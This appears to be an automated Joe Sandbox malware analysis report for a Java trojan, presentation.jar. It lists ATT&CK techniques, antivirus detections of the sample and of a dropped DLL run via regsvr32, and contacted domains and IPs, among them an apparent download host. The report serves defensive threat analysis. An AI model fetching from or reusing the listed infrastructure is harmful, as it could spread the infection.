Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Information Discovery24	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Services File Permissions Weakness1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
presentation.jar	20%	Virustotal		Browse
presentation.jar	9%	Metadefender		Browse
presentation.jar	41%	ReversingLabs	ByteCode-JAVA.Trojan.Tnega

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\broker.dll	9%	Metadefender		Browse
C:\Users\user\AppData\Local\broker.dll	28%	ReversingLabs	Win32.Trojan.Johnnie

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
10.2.regsvr32.exe.3200000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://bugreport.sun.com/bugreport/	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://r3.o.lencr.org	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
consent-pref.trustarc.com	143.204.209.31	true	false	high
consent-st.trustarc.com	143.204.209.88	true	false	high
oracle.112.2o7.net	35.181.18.61	true	false	high
docs.cyberservices.biz	50.87.249.219	true	false	unknown
prefmgr-cookie.truste-svc.net	34.202.206.65	true	false	high
consent.trustarc.com	143.204.209.41	true	false	high
static.oracle.com	unknown	unknown	false	high
www.oracle.com	unknown	unknown	false	high
s.go-mpulse.net	unknown	unknown	false	unknown
trial-eum-clienttons-s.akamaihd.net	unknown	unknown	false	high
c.oracleinfinity.io	unknown	unknown	false	unknown
84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net	unknown	unknown	false	high
685d5b19.akstat.io	unknown	unknown	false	unknown
trial-eum-clientnsv4-s.akamaihd.net	unknown	unknown	false	high
www.java.com	unknown	unknown	false	high
c.go-mpulse.net	unknown	unknown	false	unknown
dc.oracleinfinity.io	unknown	unknown	false	unknown
kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://s2.go-mpulse.net/boomerang/	~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ya.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.chambersign.org1	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.swisssign.com/0	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false		high
http://www.sogou.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://consent.trustarc.com/bannermsg?	notice[1].js0.8.dr	false		high
http://fr.search.yahoo.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.aboutads.info/consumers	get[1].js.8.dr	false		high
http://in.search.yahoo.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust	~DF9F66EA97E71930AD.TMP.7.dr	false		high
http://www.reddit.com/	msapplication.xml4.7.dr	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://watchdog.truste.com/pvr.php?page=complaint	get[1].js.8.dr	false		high
http://policy.camerfirma.com0	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js	~DF9F66EA97E71930AD.TMP.7.dr	false		high
http://www.ya.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://bugs.webkit.org/show_bug.cgi?id=3810	0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.dr	false		high
http://www.etmall.com.tw/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.google.ru/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://cps.letsencrypt.org0	java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certplus.com/CRL/class2.crl	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://bugreport.sun.com/bugreport/	java.exe, 00000002.00000002.251400043.000000000A1C5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://java.oracle.com/	java.exe, 00000002.00000002.251436069.000000000A1D5000.00000004.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://kr.search.yahoo.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.about.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://ocsp.sectigo.com	java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.igbusca.com.br/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.ask.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cjmall.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.certplus.com/CRL/class3P.crl	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.google.it/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://crl.securetrust.com/STCA.crl	java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://sads.myspace.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com	~DF9F66EA97E71930AD.TMP.7.dr	false		high
http://busca.buscape.com.br/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://consent.trustarc.com/log	notice[1].js0.8.dr	false		high
http://uk.search.yahoo.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://r3.o.lencr.org	java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ozu.es/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.google.cz/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.soso.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.univision.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
http://www.amazon.com/	msapplication.xml.7.dr	false		high
http://images.joins.com/ui_c/fvc_joins.ico	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high
https://github.com/requirejs/requirejs/blob/master/LICENSE	renderer[1].js.8.dr	false		high
http://www.asharqalawsat.com/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
143.204.209.41	consent.trustarc.com	United States	16509	AMAZON-02US	false
143.204.209.31	consent-pref.trustarc.com	United States	16509	AMAZON-02US	false
34.202.206.65	prefmgr-cookie.truste-svc.net	United States	14618	AMAZON-AESUS	false
50.87.249.219	docs.cyberservices.biz	United States	46606	UNIFIEDLAYER-AS-1US	false
143.204.209.88	consent-st.trustarc.com	United States	16509	AMAZON-02US	false
35.181.18.61	oracle.112.2o7.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	406076
Start date:	06.05.2021
Start time:	17:56:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	presentation.jar
Cookbook file name:	defaultwindowsfilecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Java) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.expl.winJAR@13/82@19/7
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 5.3% (good quality ratio 5%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .jar
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.42.151.234, 52.147.198.201, 88.221.62.148, 104.83.83.17, 104.83.125.175, 92.122.246.223, 92.122.144.36, 88.221.62.65, 104.83.83.83, 130.61.67.95, 95.101.22.216, 95.101.22.194, 23.32.238.155, 23.32.238.131, 184.30.24.56, 152.199.19.161, 2.20.142.210, 2.20.142.209, 20.82.210.154, 92.122.213.247, 92.122.213.194, 20.50.102.62 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1024.dscg.akamai.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, a248.b.akamai.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, e406.dscx.akamaiedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ds-www.java.com.edgekey.net, au-bg-shim.trafficmanager.net, e4518.dscx.akamaiedge.net, ip46.go-mpulse.net.edgekey.net, fs.microsoft.com, e11123.g.akamaiedge.net, e2581.dscx.akamaiedge.net, ie9comview.vo.msecnd.net, e870.dscx.akamaiedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ds-www.oracle.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wildcard46.akstat.io.edgekey.net, skypedataprdcoleus16.cloudapp.net, e4518.dscapi7.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, ds-oracle-microsites.edgekey.net, store-images.s-microsoft.com, wildcard46.go-mpulse.net.edgekey.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, dc.oracleinfinity.io.akadns.net, skypedataprdcolwus16.cloudapp.net, c.oracleinfinity.io.edgekey.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target java.exe, PID 5732 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.202.206.65	http://www.openair.com	Get hash	malicious	Browse	prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=http://consent-pref.trustarc.com/?type=netsuite_production&site=netsuite.com&action=notice&country=ch&locale=en&behavior=expressed&layout=default_eu&irm=undefined&from=http://consent.trustarc.com/
35.181.18.61	http://23.129.64.206	Get hash	malicious	Browse	metrics.washingtonpost.com/b/ss/wpniwashpostcom/1/H.10-Pdvu-2/s35121958062326?[AQB]&ndh=1&t=2/11/2020%2021%3A42%3A33%203%20480&ns=wpni&pageName=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_distributing_your.html&g=http%3A//voices.washingtonpost.com/securityfix/2008/08/web_fraud_20_distributing_your.html&cc=USD&ch=wp%20-%20technology&server=washingtonpost.com&events=event1&v1=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_distributing_your.html&h1=technology%7Cblogs%7Csecurityfix&c2=wp%20-%20technology&v2=wp%20-%20technology&h2=washingtonpost.com%7Ctechnology%7Cblogs%7Csecurityfix&c3=blog&c4=washingtonpost.com&c5=brian%20krebs&v6=wp%20-%20blog%20-%20/securityfix/2008/08/web_fraud_20_tools.html&c8=Thursday&c9=12%3A30AM&c10=Weekday&v11=securityfix&v14=New&v15=First%20page%20view%20or%20cookies%20not%20supported&v16=1&c17=First%20page%20view%20or%20cookies%20not%20supported&c18=New&c23=technology%7Cblogs%7Csecurityfix&c25=securityfix&c32=application%20-%20movable%20type&c33=anonymous&c34=News&s=1280x1024&c=24&j=1.6&v=Y&k=Y&bw=1280&bh=906&p=Shockwave%20Flash%3B&[AQE]
